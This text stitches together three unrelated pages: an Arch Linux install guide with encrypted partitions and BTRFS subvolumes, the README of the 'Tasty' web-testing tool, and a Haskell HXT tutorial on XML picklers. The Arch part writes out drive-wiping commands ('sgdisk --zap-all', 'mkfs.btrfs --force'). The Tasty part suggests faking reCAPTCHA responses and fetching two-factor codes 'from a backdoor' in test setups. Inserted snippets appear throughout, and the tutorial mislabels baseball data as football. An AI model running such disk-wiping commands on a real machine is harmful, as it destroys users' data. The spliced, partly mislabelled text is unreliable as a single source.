If you didn't securely wipe the drive already, it's worth "zapping" it using sgdisk to remove any lingering legacy partition information. If you already wiped the drive you can skip this command (though it won't hurt to run it again).

# sgdisk --zap-all $DRIVE

The following command will then create all three partitions in one go. It will also effectively erase the selected drive!

# sgdisk --clear \
    --new=1:0:+550MiB --typecode=1:ef00 --change-name=1:EFI \
    --new=2:0:+8GiB --typecode=2:8200 --change-name=2:cryptswap \
    --new=3:0:0 --typecode=3:8300 --change-name=3:cryptsystem \
    $DRIVE

It is worth noting that the "--change-name" values are, in this case, creating GPT "partition labels". You can subsequently see these by using the lsblk -o +PARTLABEL command. It is good to use "EFI" for the EFI partition.
I am not aware of UEFI implementations that actively use the label for identification of the EFI partition, but it is possible that some do (UEFI bios implementations are not always consistent or to spec). The other two names are entirely "arbitrary". There is nothing special about calling them cryptswap and cryptsystem; they are simply good, clear names that remind us of the purpose of each partition and what it contains (for example, "cryptswap" suggests "this partition is for swap, and is encrypted").

One final note about partition labels: we want them to be unique on your system. If for some reason there is already a GPT partition with the name EFI on another drive on your system, either change that partition name or use something besides "EFI" to avoid a namespace collision. Note also that the backslashes at the end of each line can be omitted if you are writing the command on one long line instead. Those simply allow the splitting of a single command onto multiple lines.

Format EFI Partition

Next up: format the first (EFI) partition using the (required) FAT32 filesystem.

# mkfs.fat -F32 -n EFI /dev/disk/by-partlabel/EFI

Note that we here make use of the partition label we just assigned. I prefer doing this since it simplifies scripts significantly for me and makes them, in my opinion, more readable.

Encrypt System Partition

Encrypt the main partition. Use a good passphrase. Note that the "--align-payload" value has been used as per this suggestion/explanation on the dm-crypt mailing list. Note also that I selected the encryption algorithm and key size using cryptsetup benchmark. See the Dm-crypt/Device_encryption article for more details.

# cryptsetup luksFormat --align-payload=8192 -s 256 -c aes-xts-plain64 /dev/disk/by-partlabel/cryptsystem

After creating the encrypted container, open it. Again, note the use of the partition label to identify the drive. Additionally, note that once we open this device we are giving it a name of "system."
Thus "cryptsystem" is the encrypted system partition, while "system" is the name we are using once it has been opened in an unencrypted state. These names are arbitrary (Linux doesn't care what we use) but they help us keep things organized during this process.

# cryptsetup open /dev/disk/by-partlabel/cryptsystem system

Bring Up Encrypted Swap

Finally we create encrypted swap. In this example we are not enabling hibernation; I will provide information on how to enable hibernation separately. Again, we are using partition labels to identify the partition and going from "cryptswap" to just "swap". We are not using LUKS here (which effectively makes dm-crypt easier to use); we're just using plain dm-crypt to encrypt the swap partition using a random key.

# cryptsetup open --type plain --key-file /dev/urandom /dev/disk/by-partlabel/cryptswap swap
# mkswap -L swap /dev/mapper/swap
# swapon -L swap

Create and mount BTRFS subvolumes

Now on to the main attraction: creating our BTRFS subvolume structure. While BTRFS can be set up like any other filesystem (single command, just use the created file system directly), we're going to use the power of BTRFS to enable snapshotting our system state efficiently and rollbacks as necessary.

First we create a top-level BTRFS subvolume. Note that the top-level entity in BTRFS nomenclature is still referred to as a subvolume, despite being at the top level. We will create and mount this subvolume, create some new subvolumes inside it, and then switch to those subvolumes as our proper, mounted filesystems. Doing this will enable us to treat our root filesystem as a snapshotable object.

Top-level subvolume creation:

# mkfs.btrfs --force --label system /dev/mapper/system

Temporarily mount our top-level volume for further subvolume creation. Note that the variable "o" in this case is our default set of options for any given filesystem mount, while "o_btrfs" is that set plus some options specific to btrfs.
The default option "x-mount.mkdir" is a neat trick that allows us to skip the creation of directories for mountpoints (they will be created automatically). We assume /mnt as the standard mount point, as in a normal Arch Linux installation.

# o=defaults,x-mount.mkdir
# o_btrfs=$o,compress=lzo,ssd,noatime

Note the use of our filesystem label to mount our subvolume. This is distinct from the partition labels used earlier. See the Arch wiki article on Persistent_block_device_naming for more information.

# mount -t btrfs LABEL=system /mnt

Now we create the subvolumes which will actually be mounted in our running system:

# btrfs subvolume create /mnt/root
# btrfs subvolume create /mnt/home
# btrfs subvolume create /mnt/snapshots

Then we unmount everything...

# umount -R /mnt

And remount just the subvolumes under our top-level subvolume (which remains unmounted unless we need to do "surgery" and roll back to a previous system state):

# mount -t btrfs -o subvol=root,$o_btrfs LABEL=system /mnt

Before mounting the home and snapshots subvolumes, let's walk through that command so we understand what it's doing:

The "mount -t btrfs" just specifies that our filesystem is of type BTRFS. This is often not necessary since mount will attempt to identify the filesystem type, but being explicit is often the best strategy with command line utilities, so we identify the type here. We use our previously defined mount options with the $o_btrfs variable and add the additional option "subvol=root" (separating it from our other defaults with a comma, of course). The next part of the command is "LABEL=system". Combined, this reads as "mount the filesystem with the 'system' label, and use the 'root' subvolume within it". Finally, all this gets mounted at our install root, which in this case is /mnt.

Now let's pick back up and mount our home and snapshots subvolumes. Note that while the subvolume name is "snapshots", we will mount it at ".snapshots" (note the dot prefix for the mount point).
This will keep our root directory listing clean but will still make it available at a reasonable mount location.

# mount -t btrfs -o subvol=home,$o_btrfs LABEL=system /mnt/home
# mount -t btrfs -o subvol=snapshots,$o_btrfs LABEL=system /mnt/.snapshots

It is worth noting that in each case we are telling mount to use the same filesystem, namely the one labeled "system". However, in each case we are also telling it to look for a different subvolume in that filesystem (via the "subvol=" option). With this done, we can move on to installing the actual system.

Mount EFI partition

# mount LABEL=EFI /mnt/boot

Installation of Base Arch Linux System

We are currently running off the Arch installer root filesystem. We will first use the pacstrap utility to start our installation and then we will boot into our new minimal system using systemd-nspawn.

Install base package group

# pacstrap /mnt base

fstab Generation and Modification

Create an fstab filesystem table file, using labels (-L) to identify the filesystems.

# genfstab -L -p /mnt >> /mnt/etc/fstab

I prefer to use labels as this makes the system more portable to a backup drive.
You should end up with something that looks pretty close to this:

# cat /mnt/etc/fstab
# /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
LABEL=system / btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=257,subvol=/root,subvol=root 0 0
# /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
LABEL=system /home btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=258,subvol=/home,subvol=home 0 0
# /dev/mapper/system UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
LABEL=system /.snapshots btrfs rw,noatime,compress=lzo,ssd,space_cache,subvolid=259,subvol=/snapshots,subvol=snapshots 0 0
# /dev/nvme0n1p1 UUID=xxxx-xxxx
LABEL=EFI /boot/EFI vfat rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=iso8859-1,shortname=mixed,errors=remount-ro 0 2
# /dev/mapper/swap UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
LABEL=swap none swap defaults 0 0

There is one problem, however. Swap will not remount this way (the plain dm-crypt partition with a random key will not have a label when it is recreated on reboot). You will have to change that line from this:

LABEL=swap none swap defaults 0 0

to this:

/dev/mapper/swap none swap defaults 0 0

This will ensure that the mapped device is opened as swap successfully. The other lines may remain unchanged.

Use sed instead

As a (scriptable) alternative to the manual editing of your /etc/fstab, you could use sed(1) to edit the file in place:

# sed -i 's+LABEL=swap+/dev/mapper/swap+' /mnt/etc/fstab

Boot into new system

# systemd-nspawn -bD /mnt

This will boot your new base Arch Linux system. After the standard boot messages scroll by, you will be presented with a login prompt (enter root and hit enter to log in).

Generate and set locale

Next, edit and uncomment your desired locale(s) in /etc/locale.gen. We use vi in the example below, but you could use a simpler editor such as nano if you wish.

# vi /etc/locale.gen

Uncomment the line for your locale (en_US.UTF-8 in this example), changing:

#en_US.UTF-8 UTF-8

to:

en_US.UTF-8 UTF-8
Alternatively, one could simply append a known value to the /etc/locale.gen file:

# echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen

After either method, run the locale-gen command to generate the locale files:

# locale-gen

Finally, we use systemd-firstboot(1) or localectl(1) to set the system locale. Each of these effectively does the same thing, which is to simply write to /etc/locale.conf (which can also be edited directly as per the standard Arch install instructions).

With systemd-firstboot

systemd-firstboot(1) will prompt us for a selection from our generated locales. It will only work if there is no assigned system locale. If you wish to make changes afterward you can use localectl(1).

# systemd-firstboot --prompt-locale

With localectl

This is an alternative to using systemd-firstboot --prompt-locale. It may also be used subsequent to that command if further changes to the locale are desired. If you need a reminder of which locales have been installed (during this install or later during system changes), use localectl list-locales:

# localectl list-locales
en_US.UTF-8

We then use localectl set-locale:

# localectl set-locale LANG=en_US.UTF-8

Time and Date

Unless you have a reason not to, we'll turn on NTP synchronization.

# timedatectl set-ntp 1

Then list timezones and pick one:

# timedatectl list-timezones
...
# timedatectl set-timezone America/Los_Angeles

Set hostname

# hostnamectl set-hostname myhostname

See the man page for hostnamectl(1) for other attributes that can be set. You might also add the hostname to hosts(5):

/etc/hosts
127.0.0.1 localhost.localdomain localhost
::1 localhost.localdomain localhost
127.0.1.1 myhostname.localdomain myhostname

Use echo for a scriptable solution:

# echo "127.0.1.1 myhostname.localdomain myhostname" >> /etc/hosts

Network configuration

Configure the network for the newly installed environment: see Network configuration.
For wireless configuration, install the iw, wpa_supplicant, and dialog packages, as well as any needed firmware packages.

Base Package Installation

We've already included the base group which is, strictly speaking, all you need to boot a minimal Arch Linux system. At this stage, however, we can install some useful utilities (and Xorg or Wayland, etc.).

# pacman -Syu base-devel btrfs-progs iw gptfdisk zsh vim terminus-font

Initramfs

Creating a new initramfs is usually not required, because mkinitcpio was run on installation of the linux package with pacstrap. However, we'll need to make some changes to the hooks used on our system. Additionally, I switched over to using the systemd hooks in mkinitcpio, so that is largely what you'll see in my example below. I recommend making a backup of your /etc/mkinitcpio.conf file first:

# mv /etc/mkinitcpio.conf /etc/mkinitcpio.conf.orig

and then editing a new file to match the following contents:

MODULES=""
BINARIES=""
FILES=""
HOOKS="base systemd sd-vconsole modconf keyboard block filesystems btrfs sd-encrypt fsck"

Finally, recreate the initramfs image:

# mkinitcpio -p linux

Bootloader

Root password

# passwd

Leave the systemd-nspawn environment

Issue a poweroff to exit the nspawned environment:

# poweroff

This will return you to the Arch installer environment where you can wrap up.

Legacy boot loader

If your system is not UEFI and you need to use a legacy installer like grub, it will need to be installed from within an arch-chroot generated chroot, not the systemd-nspawn running container. An example of this would be (assuming that the drive of the new system is at /dev/sdb):

# arch-chroot /mnt
# grub-install $DRIVE
# grub-mkconfig -o /boot/grub/grub.cfg
# exit

Command Summary

The following are all critical commands (excluded: the initial drive wipe, which is optional). It assumes you have successfully brought up networking prior to starting this sequence.
DRIVE=/dev/DRIVEID
sgdisk --zap-all $DRIVE
sgdisk --clear \
    --new=1:0:+550MiB --typecode=1:ef00 --change-name=1:EFI \
    --new=2:0:+8GiB --typecode=2:8200 --change-name=2:cryptswap \
    --new=3:0:0 --typecode=3:8300 --change-name=3:cryptsystem \
    $DRIVE
mkfs.fat -F32 -n EFI /dev/disk/by-partlabel/EFI
cryptsetup luksFormat --align-payload=8192 -s 256 -c aes-xts-plain64 /dev/disk/by-partlabel/cryptsystem
cryptsetup open /dev/disk/by-partlabel/cryptsystem system
cryptsetup open --type plain --key-file /dev/urandom /dev/disk/by-partlabel/cryptswap swap
mkswap -L swap /dev/mapper/swap
swapon -L swap
mkfs.btrfs --force --label system /dev/mapper/system
o=defaults,x-mount.mkdir
o_btrfs=$o,compress=lzo,ssd,noatime
mount -t btrfs LABEL=system /mnt
btrfs subvolume create /mnt/root
btrfs subvolume create /mnt/home
btrfs subvolume create /mnt/snapshots
umount -R /mnt
mount -t btrfs -o subvol=root,$o_btrfs LABEL=system /mnt
mount -t btrfs -o subvol=home,$o_btrfs LABEL=system /mnt/home
mount -t btrfs -o subvol=snapshots,$o_btrfs LABEL=system /mnt/.snapshots
mount LABEL=EFI /mnt/boot
pacstrap /mnt base
genfstab -L -p /mnt >> /mnt/etc/fstab
sed -i 's+LABEL=swap+/dev/mapper/swap+' /mnt/etc/fstab
echo "127.0.1.1 myhostname.localdomain myhostname" >> /etc/hosts
pacman -Syu base-devel btrfs-progs iw gptfdisk zsh vim terminus-font

Quick and Dirty

This is the approximate process I follow if I want to bring up Arch on, say, an old laptop for a quick purpose-built test machine, etc. It's not an install that I consider long-term maintainable, since rollbacks aren't implemented, nor is there any encryption, but it's a good example of how simple installation can be.

DRIVE=/dev/DRIVEID
sgdisk --zap-all $DRIVE
mkfs.btrfs -f $DRIVE
mount -t btrfs $DRIVE /mnt
pacstrap /mnt base grub
poweroff
arch-chroot /mnt
grub-install --root-directory=/mnt $DRIVE
grub-mkconfig -o /mnt/boot/grub/grub.cfg
exit
reboot
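The fstab swap-line fix from the summary can be rehearsed safely against a scratch file before touching the real fstab; a minimal sketch (the temporary file stands in for /mnt/etc/fstab):

```shell
# Rehearse the fstab swap fix on a scratch copy: LABEL=swap is unreliable
# for plain dm-crypt swap (the label vanishes on reboot), so the entry
# must point at the mapped device instead.
tmp=$(mktemp)
printf '%s\n' 'LABEL=swap none swap defaults 0 0' > "$tmp"
sed -i 's+LABEL=swap+/dev/mapper/swap+' "$tmp"
cat "$tmp"   # /dev/mapper/swap none swap defaults 0 0
rm -f "$tmp"
```

Using `+` as the sed delimiter avoids having to escape the slashes in the device path.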
https://wiki.archlinux.org/index.php/User:Altercation/Bullet_Proof_Arch_Install
Tasty helps test fully assembled web applications in a nearly-production environment, on real clients, as real users.

npm install -g tasty

Tasty supports both multiple and single page applications (with server rendering too) and code coverage. It respects Content Security Policy and SSL/TLS. The Tasty server controls connected clients to run your tests against your application. A client can emulate a real user: navigate, fill forms, check content. Add the tasty.js module to your assembly or markup.

Tasty is intended to run inside a browser environment without WebDriver. However, you can use Selenium-driven clients and headless browsers like PhantomJS or SlimerJS to work with Tasty.

Tasty gives you only high-level tools to help treat your application as a black box, just like a real user does. Interact with text and graphics, not with heartless HTML elements. Try not to use knowledge of your application's markup; assume you're helping a real person to achieve some goals.

Protractor and WebdriverIO are Selenium-based end-to-end test frameworks useful for integration testing. Also take a look at Appium, CasperJS and Selendroid. Karma and Testee are great tools for cross-browser unit testing.

Serve your application. Write a test (this one uses Mocha). Run the Tasty server:

tasty test.js --username 'John Doe' --password 'secret!'

Open your application in your client. Tasty will run the test, print all output and exit.

The Tasty server is a bridge between the clients and the test runner; it controls each client and runs tests written using Tasty tools. Use the --url flag to configure the server's own URL.

The Tasty client is a small extendable UMD module that connects to the server and executes its commands.

Tasty supports any test framework that supports asynchronous tests. There are built-in runners for Mocha, Jasmine and QUnit. Provide the --runner <name> flag to use one of them. For other frameworks, use Tasty programmatically from your runner.
Chai, its plugins and other helper libraries are supported by providing the --addon <name>,<name>... flag. For example, --addon chai,chai-as-promised,chai-http works fine.

Use the --watch flag to watch for changes or run on several clients. See tasty --help for more information.

You can run the built-in static server on the same URL by passing the --static <path/to/root> flag.

When serving your application from its own server, you should instrument JavaScript code for coverage by yourself. Tasty's static server has built-in support for Istanbul and NYC (aka Istanbul 2) to automatically do it for you.

For a Tasty server running on localhost:8765/path you should add the following CSP directives for the Tasty client to work properly:

connect-src localhost:8765/path ws://localhost:8765/path wss://localhost:8765/path
script-src localhost:8765/path/*.js

Unfortunately, both the Istanbul and NYC instrumenters use new Function() to get the top-level scope. To use one of them, you have to add the following directive:

script-src 'unsafe-eval'

Tasty's static server automatically injects that directive into HTML files when the --coverage <name> flag is used. Remember, CSP allows consequently applied directives to only restrict the resulting set, i.e. meta tags can't expand/loosen header directives and vice versa. Check out a great tool for generating and validating CSP directives.

The Tasty client runs inside a JavaScript sandbox, so it simply can't emulate real interaction the way debugging protocols or WebDriver can. Currently Tasty can't find text such as +1 123 456-78-90 when it is split across several markup fragments. In other words, it's too hard to join text fragments of textContent, value/placeholder, :before/:after etc. Work is in progress. Search cannot detect text from the alt attribute yet.

When using auto-focus elements (such as input), you could encounter a "cannot type into active node <body />" error when the window loses its focus, which causes the type and paste tools to fail.
If you don't want to focus such elements explicitly (using click or something else), make sure that the client window remains focused during tests. For WebDriver clients you could maximize the window or use an alert() workaround to focus reliably. Additionally, Chrome DevTools could force the current tab to lose focus, with the same results.

Not supported yet. Some elements of the browser itself, such as tooltips from the title attribute or HTML5 Form validation messages, could potentially be detected, but currently aren't supported.

Each tool adds a corresponding action to the runner queue instead of performing that action immediately. This allows you to write tests in a synchronous manner.

The queue is executed after a now() call without arguments, which returns a Promise instance. Your testing framework may prefer a callback for async tests.

For testing a SPA (or rich MPA) you can provide a method for Tasty to ensure that the client is ready for the next action. The simplest way is to just wait after using some tools. You may override the list of tools to wait after. You can always manually add a delay into the queue.

There could be enough to just check if the DOM is ready — the 'DOMContentLoaded' aka 'interactive' readyState, or the 'load' aka 'complete' readyState — and maybe wait a little bit. Another way is to provide some application-specific code. Note that the built-in methods cannot be combined.

The now(...) call with function(s) allows you to add some custom logic into the test, but you should use the now.* namespace for tools. The now.smth() is the same as just smth(), but runs immediately. You should use now.* tools only inside a now(...) call if you don't want to break the execution order.

On staging or another near-production environment, Tasty can't pass (re)CAPTCHA or two-factor authentication for you. Store passwords in CIS and pass credentials into the command line. All arguments will be available in the tasty.config object.
Get two-factor nonces from a backdoor or use paid services to mock real mobile phones.

Use the reCAPTCHA testing sitekey and secret for the testing environment. Instead of trying to click on iframed content, simply fake the reCAPTCHA response with some suitable string. For the testing sitekey and secret, the reCAPTCHA server should accept the same g-recaptcha-response an unlimited number of times. If the example above doesn't work (e.g. the response format has changed), get a new fake g-recaptcha-response string from the value property of <textarea name="g-recaptcha-response" /> on the page. For other CAPTCHA implementations, get answers from a backdoor.

Do not use production certificates with Tasty: the server is not intended to be accessible from external networks. Use Let's Encrypt, self-signed non-CA certificates, or set up your own CA.

npm run prepublish
npm test

Main tests use SlimerJS and PhantomJS. SlimerJS itself requires Firefox to be installed. The PhantomJS suite requires phantomjs to be available via the command prompt.

npm run support

Real-browser support tests are made possible by SauceLabs. Automation requires the SAUCE_USERNAME and SAUCE_ACCESS_KEY environment variables, which are kindly provided by TravisCI. Everything works fine, yay!
https://www.npmjs.com/package/tasty
HXT/Conversion of Haskell data from/to XML
Revision as of 16:49, 19 April 2008

Serializing and deserializing Haskell data to/from XML

With so-called pickler functions and arrows, it becomes rather easy and straightforward to convert native Haskell values to XML and vice versa. The module Text.XML.HXT.Arrow.Pickle and submodules contain a set of picklers (conversion functions) for simple data types and pickler combinators for complex types.

Contents
- 1 Serializing and deserializing Haskell data to/from XML
- 2 The idea: XML pickler
- 3 Example: Processing football league data
- 4 Example: A toy programming language
- 5 A few words of advice

The idea: XML pickler

For conversion of native Haskell data, a pickler for a value of type a working on a sequence of Chars looks like this:

type St = [Char]

data PU a = PU { appPickle   :: (a, St) -> St
               , appUnPickle :: St -> (a, St)
               }

Andrew Kennedy has described in a programming pearl paper [1] how to define primitive picklers and a set of pickler combinators to de-/serialize from/to (Byte-)Strings. The HXT picklers are an adaptation of these pickler combinators. The difference to Andrew Kennedy's approach is that the target is not a list of Chars but a list of XmlTrees. The basic picklers will convert data into XML text nodes. New are the picklers for creating elements and attributes. The HXT pickler type is defined as follows:

data St = St { attributes :: [XmlTree]
             , contents   :: [XmlTree]
             }

data PU a = PU { appPickle   :: (a, St) -> St
               , appUnPickle :: St -> (Maybe a, St)
               , theSchema   :: Schema
               }

In XML there are two places for storing data — the attribute list and the element contents — hence the two fields of the St state.
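The PU record above is just a pair of functions threaded through a serialization state. To make the idea concrete outside Haskell, here is a minimal Python analogue of Kennedy's original string-based picklers (the names and the "digits;" encoding are my own illustration, not HXT's API):

```python
class PU:
    """A pickler: a pickle function (value, state) -> state and
    an unpickle function state -> (value, remaining state)."""
    def __init__(self, pickle, unpickle):
        self.pickle = pickle      # (a, str) -> str
        self.unpickle = unpickle  # str -> (a, str)

# primitive pickler for a non-negative int, encoded as "<digits>;"
xp_int = PU(
    lambda n, st: st + str(n) + ";",
    lambda st: (int(st[:st.index(";")]), st[st.index(";") + 1:]),
)

s = xp_int.pickle(1998, "")
print(s)                 # 1998;
v, rest = xp_int.unpickle(s)
print(v, repr(rest))     # 1998 ''
```

The HXT variant keeps this shape but replaces the string state with the St record of attribute and content XmlTrees, and makes unpickling partial (Maybe a) so a failed parse can be reported.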
Example: Processing football league data

<SEASON YEAR="1998">
  <LEAGUE NAME="National League">
    <DIVISION NAME="East">
      <TEAM CITY="Atlanta" NAME="Braves">
        <PLAYER GIVEN_NAME="Marty" SURNAME="Malloy" POSITION="Second Base"
                GAMES="11" GAMES_STARTED="8" AT_BATS="28" RUNS="3" HITS="5"
                DOUBLES="1" TRIPLES="0" HOME_RUNS="1" RBI="1" STEALS="0"
                CAUGHT_STEALING="0" SACRIFICE_HITS="0" SACRIFICE_FLIES="0"
                ERRORS="0" WALKS="2" STRUCK_OUT="2" HIT_BY_PITCH="0">
        </PLAYER>
        <PLAYER GIVEN_NAME="Ozzie" SURNAME="Guillen" POSITION="Shortstop"
                GAMES="83" GAMES_STARTED="59" AT_BATS="264" RUNS="35" HITS="73"
                DOUBLES="15" TRIPLES="1" HOME_RUNS="1" RBI="22" STEALS="1"
                CAUGHT_STEALING="4" SACRIFICE_HITS="4" SACRIFICE_FLIES="2"
                ERRORS="6" WALKS="24" STRUCK_OUT="25" HIT_BY_PITCH="1">
        </PLAYER>
        <PLAYER GIVEN_NAME="Danny" ... </PLAYER>
        <PLAYER GIVEN_NAME="Gerald" ...> </PLAYER>
        ...
      </TEAM>
      <TEAM CITY="Florida" NAME="Marlins"> </TEAM>
      <TEAM CITY="Montreal" NAME="Expos"> </TEAM>
      <TEAM CITY="New York" NAME="Mets"> </TEAM>
      <TEAM CITY="Philadelphia" NAME="Phillies"> </TEAM>
    </DIVISION>
    ...
  </LEAGUE>
  <LEAGUE NAME="American League">
    <DIVISION NAME="East"> ... </DIVISION>
    <DIVISION NAME="Central"> ... </DIVISION>
    ...
  </LEAGUE>
</SEASON>

The Haskell data model

Let's first analyze the underlying data model and then define an appropriate set of Haskell data types. Of the player attributes we will only use the firstName, the lastName, the position, atBats, hits and era. All others will be ignored.
So the Haskell data model looks like this:

import Data.Map (Map, fromList, toList)

data Season = Season { sYear    :: Int
                     , sLeagues :: Leagues
                     } deriving (Show, Eq)

type Leagues   = Map String Divisions
type Divisions = Map String [Team]

data Team = Team { teamName :: String
                 , city     :: String
                 , players  :: [Player]
                 } deriving (Show, Eq)

data Player = Player { firstName :: String
                     , lastName  :: String
                     , position  :: String
                     , atBats    :: Maybe Int
                     , hits      :: Maybe Int
                     , era       :: Maybe Float
                     } deriving (Show, Eq)

The predefined picklers

In HXT there is a class XmlPickler defining a single function xpickle for overloading the xpickle name:

class XmlPickler a where
  xpickle :: PU a

For the simple data types there is an instance of XmlPickler which uses the primitive pickler xpPrim for conversion from and to XML text nodes. This primitive pickler is available for all types supporting read and show.

instance XmlPickler Int where
  xpickle = xpPrim

instance XmlPickler Integer where
  xpickle = xpPrim
...

For composite data there are predefined pickler combinators for tuples, lists and Maybe types.

instance (XmlPickler a, XmlPickler b) => XmlPickler (a,b) where
  xpickle = xpPair xpickle xpickle

instance XmlPickler a => XmlPickler [a] where
  xpickle = xpList xpickle

instance XmlPickler a => XmlPickler (Maybe a) where
  xpickle = xpOption xpickle

- xpPair takes two picklers and builds up a pickler for a tuple type. There are also pickler combinators for triples, 4- and 5-tuples.
- xpList takes a pickler for an element type and gives a list pickler.
- xpOption takes a pickler and returns a pickler for optional values.

Furthermore we need picklers for generating/reading element and attribute nodes:

- xpElem generates/parses an XML element node
- xpAttr generates/parses an attribute node

Most of the other structured data is pickled/unpickled by converting the data to/from tuples, lists and options. This is done by a wrapper pickler xpWrap.
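These combinators compose mechanically. Staying with the string-based Python analogue of Kennedy's picklers (again my own illustrative encoding, not HXT's API), xpPair, xpList and xpWrap can be sketched like this:

```python
class PU:
    def __init__(self, pickle, unpickle):
        self.pickle = pickle      # (a, str) -> str
        self.unpickle = unpickle  # str -> (a, str)

xp_int = PU(  # primitive: non-negative int as "<digits>;"
    lambda n, st: st + str(n) + ";",
    lambda st: (int(st[:st.index(";")]), st[st.index(";") + 1:]),
)

def xp_pair(pa, pb):              # analogue of xpPair
    def pickle(ab, st):
        return pb.pickle(ab[1], pa.pickle(ab[0], st))
    def unpickle(st):
        a, st = pa.unpickle(st)
        b, st = pb.unpickle(st)
        return (a, b), st
    return PU(pickle, unpickle)

def xp_list(p):                   # analogue of xpList: length-prefixed list
    def pickle(xs, st):
        st = xp_int.pickle(len(xs), st)
        for x in xs:
            st = p.pickle(x, st)
        return st
    def unpickle(st):
        n, st = xp_int.unpickle(st)
        xs = []
        for _ in range(n):
            x, st = p.unpickle(st)
            xs.append(x)
        return xs, st
    return PU(pickle, unpickle)

def xp_wrap(wrap, unwrap, p):     # analogue of xpWrap: a 1-1 mapping around p
    return PU(
        lambda v, st: p.pickle(unwrap(v), st),
        lambda st: (lambda vu: (wrap(vu[0]), vu[1]))(p.unpickle(st)),
    )

# wrap a record-like dict over a (year, scores) pair
xp_rec = xp_wrap(
    lambda t: {"year": t[0], "scores": t[1]},
    lambda d: (d["year"], d["scores"]),
    xp_pair(xp_int, xp_list(xp_int)),
)

s = xp_rec.pickle({"year": 1998, "scores": [3, 5]}, "")
print(s)                      # 1998;2;3;5;
print(xp_rec.unpickle(s)[0])  # {'year': 1998, 'scores': [3, 5]}
```

The xp_wrap trick — converting the record to and from a tuple — is exactly how the Haskell examples below use xpWrap to pickle Maps and records through pairs and triples.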
Constructing the example picklers

For every Haskell type we will define a pickler. For our own data types we will declare instances of XmlPickler:

instance XmlPickler Season where
  xpickle = xpSeason

instance XmlPickler Team where
  xpickle = xpTeam

instance XmlPickler Player where
  xpickle = xpPlayer

Then the picklers are developed top down, starting with xpSeason.

xpSeason :: PU Season
xpSeason = xpElem "SEASON" $
           xpWrap ( uncurry Season
                  , \ s -> (sYear s, sLeagues s)
                  ) $
           xpPair (xpAttr "YEAR" xpickle) xpLeagues

A Season value is mapped onto an element SEASON with xpElem. This constructs/reads the XML SEASON element. The two components of Season are wrapped into a pair with xpWrap. xpWrap needs a pair of functions for a 1-1 mapping between Season and (Int, Leagues). The first component of the pair, the year, is mapped onto an attribute YEAR; the attribute value is handled with the predefined pickler for Int. The second one, the Leagues, is handled by xpLeagues.

xpLeagues :: PU Leagues
xpLeagues = xpWrap ( fromList
                   , toList
                   ) $
            xpList $
            xpElem "LEAGUE" $
            xpPair (xpAttr "NAME" xpText) xpDivisions

xpLeagues has to deal with a Map value. This can't be done directly, but the Map value is converted to/from a list of pairs with xpWrap and (fromList, toList). Then xpList is applied to the list of pairs. Each pair will be represented by a LEAGUE element, the name is mapped to an attribute NAME, and the divisions are handled by xpDivisions.

xpDivisions :: PU Divisions
xpDivisions = xpWrap ( fromList
                     , toList
                     ) $
              xpList $
              xpElem "DIVISION" $
              xpPair (xpAttr "NAME" xpText) xpickle

The divisions are pickled by the same pattern as the leagues.

xpTeam :: PU Team
xpTeam = xpElem "TEAM" $
         xpWrap ( uncurry3 Team
                , \ t -> (teamName t, city t, players t)
                ) $
         xpTriple (xpAttr "NAME" xpText)
                  (xpAttr "CITY" xpText)
                  (xpList xpickle)

With the teams we have to wrap the three components into a 3-tuple with xpWrap and then pickle a triple of two attributes and a list of players.
xpPlayer :: PU Player
xpPlayer = xpElem "PLAYER" $
           xpWrap ( \ ((f,l,p),(a,h,e)) -> Player f l p a h e
                  , \ t -> ( (firstName t, lastName t, position t)
                           , (atBats t, hits t, era t) )
                  ) $
           xpPair (xpTriple (xpAttr "GIVEN_NAME" xpText)
                            (xpAttr "SURNAME" xpText)
                            (xpAttr "POSITION" xpText))
                  (xpTriple (xpOption (xpAttr "AT_BATS" xpickle))
                            (xpOption (xpAttr "HITS" xpickle))
                            (xpOption (xpAttr "ERA" xpickle)))

New in this case is the use of xpOption for mapping Maybe values onto optional attributes. The other attributes used in the input are ignored during unpickling of the XML, but this is the only place where the pickler is tolerant of wrong XML.

A simple application

import Text.XML.HXT.Arrow

-- ...

main :: IO ()
main = do
  runX ( xunpickleDocument xpSeason
           [ (a_validate, v_0)
           , (a_trace, v_1)
           , (a_remove_whitespace, v_1)
           , (a_preserve_comment, v_0)
           ] "simple2.xml"
         >>>
         processSeason
         >>>
         xpickleDocument xpSeason
           [ (a_indent, v_1)
           ] "new-simple2.xml"
       )
  return ()

-- the dummy for processing the unpickled data
processSeason :: IOSArrow Season Season
processSeason = arrIO ( \ x -> do { print x ; return x } )

This application reads in the complete data used in HXT/Practical/Simple2 from the file simple2.xml and unpickles it into a Season value. This value is processed (dummy: printed out) by processSeason and pickled again into new-simple2.xml.

The unpickled value, when formatted a bit, looks like this:

Season
  { sYear = 1998
  , sLeagues = fromList
      [ ( "American League"
        , fromList
            [ ( "Central", [ Team { teamName = "White Sox", city = "Chicago",   players = [] }, ... ] )
            , ( "East",    [ Team { teamName = "Orioles",   city = "Baltimore", players = [] }, ... ] )
            , ( "West",    [ Team { teamName = "Angels",    city = "Anaheim",   players = [] }, ... ] )
            ] )
      , ( "National League"
        , fromList
            [ ( "Central", [ Team { teamName = "Cubs", city = "Chicago", players = [] }, ... ] )
            , ( "East"
              , [ Team { teamName = "Braves"
                       , city = "Atlanta"
                       , players =
                           [ Player { firstName = "Marty", lastName = "Malloy", position = "Second Base"
                                    , atBats = Just 28, hits = Just 5, era = Nothing }
                           , Player { firstName = "Ozzie", lastName = "Guillen", position = "Shortstop"
                                    , atBats = Just 264, hits = Just 73, era = Nothing }
                           , ... ] }
                , ... ] )
            , ( "West",    [ Team { teamName = "Diamondbacks", city = "Arizona", players = [] }, ... ] )
            ] )
      ]
  }

Example: A toy programming language

In this second example we will develop the picklers the other way round. We start with a given data model and derive an XML document structure. The complete source is part of the HXT distribution.

A few words of advice

